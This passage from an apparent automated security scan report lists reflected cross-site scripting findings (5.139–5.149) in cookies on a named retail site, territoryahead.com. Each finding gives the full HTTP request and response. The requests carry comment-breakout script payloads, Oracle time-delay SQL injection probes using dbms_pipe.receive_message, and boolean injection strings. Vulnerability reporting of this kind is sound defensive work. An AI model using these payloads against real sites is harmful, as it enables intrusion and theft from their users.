Cookie: mmlID=6840816836d2e--><script>alert(1)</script>1deb5b8a81e; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount; JSESSIONID=eDwn-UFCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5
...[SNIP]...
5.139. https://www.territoryahead.com/account/login/loginmain%20.jsp [order cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of the order cookie is copied into an HTML comment. The payload 52f6b--><script>alert(1)</script>94ebbb28b25 was submitted in the order cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=6350391452f6b--><script>alert(1)</script>94ebbb28b25; customer=92643931; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:25:57 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ncoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=6350391452f6b--><script>alert(1)</script>94ebbb28b25; customer=92643931; PS_ALL=%23ps_catid%7Eaccount; JSESSIONID=eDwn-UFCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301081933&v=3&e=1301083737353

...[SNIP]...
5.140. https://www.territoryahead.com/jump.jsp [90232094_clogin cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the 90232094_clogin cookie is copied into an HTML comment. The payload 8af22--><script>alert(1)</script>26113198838 was submitted in the 90232094_clogin cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d10; s_cc=true; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=13010823252448af22--><script>alert(1)</script>26113198838

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:29:35 GMT
Server: Apache
ETag: "AAAAS7uc384"
Last-Modified: Fri, 25 Mar 2011 19:17:50 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 39295


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
8108%29%257c%257cchr%28101%29%257c%257cchr%28109%29%257c%257cchr%28109%29%257c%257cchr%2897%29%29%252c25%29+from+dual%29; s_cc=true; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=13010823252448af22--><script>alert(1)</script>26113198838; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: nTUv8KwSrSgAAH2NuQkAAAAl
SCRIPT_URL: /jump.jsp
SCRIPT_URI: https://www.territoryahead.com/jump.jsp
HTTPS: on

Cookies:
mmlID = 68408168

...[SNIP]...
5.141. https://www.territoryahead.com/jump.jsp [CoreID6 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the CoreID6 cookie is copied into an HTML comment. The payload 70ca4--><script>alert(1)</script>974b3a0bf3c was submitted in the CoreID6 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=9023209470ca4--><script>alert(1)</script>974b3a0bf3c; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:25:47 GMT
Server: Apache
ETag: "AAAAS7ucAYc"
Last-Modified: Fri, 25 Mar 2011 19:14:02 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38491


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=9023209470ca4--><script>alert(1)</script>974b3a0bf3c; order=63503913; customer=92643931; JSESSIONID=auMBUcQMcNOb; s_cc=true; s_sq=%5B%5BB%5D%5D; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; 90232094_clogin=l=1301080516&v=3&e=1301082340667; PS_ALL=%23ps_ca
...[SNIP]...
5.142. https://www.territoryahead.com/jump.jsp [JSESSIONID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the JSESSIONID cookie is copied into an HTML comment. The payload c0c2f--><script>alert(1)</script>048dd4a1770 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-ec0c2f--><script>alert(1)</script>048dd4a1770

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:26:23 GMT
Server: Apache
ETag: "AAAAS7ucJRV"
Last-Modified: Fri, 25 Mar 2011 19:14:38 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=63503913; Path=/; Expires=Fri, 08-Apr-2011 19:14:38 GMT
Set-Cookie: customer=92643931; Path=/; Expires=Sat, 23-Mar-2019 19:14:38 GMT
Set-Cookie: JSESSIONID=aeBRiVzxLAc_; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38472


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ge: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503913; customer=92643931; JSESSIONID=a-e7l_ipIG-ec0c2f--><script>alert(1)</script>048dd4a1770; s_cc=true; s_sq=%5B%5BB%5D%5D; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; 90232094_clogin=l=1301080516&v=3&e=1301082340667; PS_ALL=%23ps_catid%7E%28select+dbms_pipe.receive_message%28%28chr%2895%29%2
...[SNIP]...
5.143. https://www.territoryahead.com/jump.jsp [PS_ALL cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the PS_ALL cookie is copied into an HTML comment. The payload 96a8c--><script>alert(1)</script>5d6a7c7b9bc was submitted in the PS_ALL cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d1096a8c--><script>alert(1)</script>5d6a7c7b9bc; s_cc=true; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=1301082325244

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:20:21 GMT
Server: Apache
ETag: "AAAAS7ucy4D"
Last-Modified: Fri, 25 Mar 2011 19:17:29 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38741


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
tf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503913; customer=92643931; JSESSIONID=auMBUcQMcNOb; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d1096a8c--><script>alert(1)</script>5d6a7c7b9bc; s_cc=true; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=1301082340667; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: fC0vAqwSrRQAAGydCu0AAAAR
SCRIPT_URL: /jump.jsp
SCRIPT_URI: https
...[SNIP]...
5.144. https://www.territoryahead.com/jump.jsp [cmTPSet cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the cmTPSet cookie is copied into an HTML comment. The payload c8e35--><script>alert(1)</script>691c4488899 was submitted in the cmTPSet cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; cmTPSet=Yc8e35--><script>alert(1)</script>691c4488899; PS_ALL=%23ps_catid%7E-1+or+17-7%253d10; s_cc=true; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=1301082325244

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:20:06 GMT
Server: Apache
ETag: "AAAAS7ucvNU"
Last-Modified: Fri, 25 Mar 2011 19:17:14 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 39295


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
n;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503913; customer=92643931; JSESSIONID=auMBUcQMcNOb; cmTPSet=Yc8e35--><script>alert(1)</script>691c4488899; PS_ALL=%23ps_catid%7E%28select+dbms_pipe.receive_message%28%28chr%2895%29%257c%257cchr%2833%29%257c%257cchr%2864%29%257c%257cchr%2851%29%257c%257cchr%28100%29%257c%257cchr%28105%29%257c%257cchr%28108
...[SNIP]...
5.145. https://www.territoryahead.com/jump.jsp [customer cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the customer cookie is copied into an HTML comment. The payload 451ec--><script>alert(1)</script>e1e6716de1c was submitted in the customer cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931451ec--><script>alert(1)</script>e1e6716de1c; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:17:17 GMT
Server: Apache
ETag: "AAAAS7ucGB4"
Last-Modified: Fri, 25 Mar 2011 19:14:25 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38491


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
te,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503913; customer=92643931451ec--><script>alert(1)</script>e1e6716de1c; JSESSIONID=auMBUcQMcNOb; s_cc=true; s_sq=%5B%5BB%5D%5D; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; 90232094_clogin=l=1301080516&v=3&e=1301082340667; PS_ALL=%23ps_catid%7E%28select+dbms_pipe.receive_m
...[SNIP]...
5.146. https://www.territoryahead.com/jump.jsp [mmlID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the mmlID cookie is copied into an HTML comment. The payload c290d--><script>alert(1)</script>9551fb33735 was submitted in the mmlID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168c290d--><script>alert(1)</script>9551fb33735; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:16:36 GMT
Server: Apache
ETag: "AAAAS7ub8EQ"
Last-Modified: Fri, 25 Mar 2011 19:13:44 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 37868


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168c290d--><script>alert(1)</script>9551fb33735; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; s_cc=true; s_sq=%5B%5BB%5D%5D; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d10; 90232094_clo
...[SNIP]...
5.147. https://www.territoryahead.com/jump.jsp [order cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the order cookie is copied into an HTML comment. The payload 2d0a4--><script>alert(1)</script>bcb7d662e45 was submitted in the order cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=635039142d0a4--><script>alert(1)</script>bcb7d662e45; customer=92643931; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:17:02 GMT
Server: Apache
ETag: "AAAAS7ucCQU"
Last-Modified: Fri, 25 Mar 2011 19:14:10 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38491


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ncoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=635039142d0a4--><script>alert(1)</script>bcb7d662e45; customer=92643931; JSESSIONID=auMBUcQMcNOb; s_cc=true; s_sq=%5B%5BB%5D%5D; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; 90232094_clogin=l=1301080516&v=3&e=1301082340667; PS_ALL=%23ps_catid%7E%28select+
...[SNIP]...
5.148. https://www.territoryahead.com/jump.jsp [s_cc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the s_cc cookie is copied into an HTML comment. The payload 15573--><script>alert(1)</script>baa59d3f676 was submitted in the s_cc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d10; s_cc=true15573--><script>alert(1)</script>baa59d3f676; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=1301082325244

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:29:22 GMT
Server: Apache
ETag: "AAAAS7uc0rL"
Last-Modified: Fri, 25 Mar 2011 19:17:36 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 39295


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
chr%2851%29%257c%257cchr%28100%29%257c%257cchr%28105%29%257c%257cchr%28108%29%257c%257cchr%28101%29%257c%257cchr%28109%29%257c%257cchr%28109%29%257c%257cchr%2897%29%29%252c25%29+from+dual%29; s_cc=true15573--><script>alert(1)</script>baa59d3f676; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=1301082340667; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: nGhmwawSrSgAAET9iDcAAAA6
SCRIPT_URL: /jump.jsp
SCRIPT_URI: https://www.terr
...[SNIP]...
5.149. https://www.territoryahead.com/jump.jsp [s_sq cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the s_sq cookie is copied into an HTML comment. The payload a3d4d--><script>alert(1)</script>26f91f30e7b was submitted in the s_sq cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

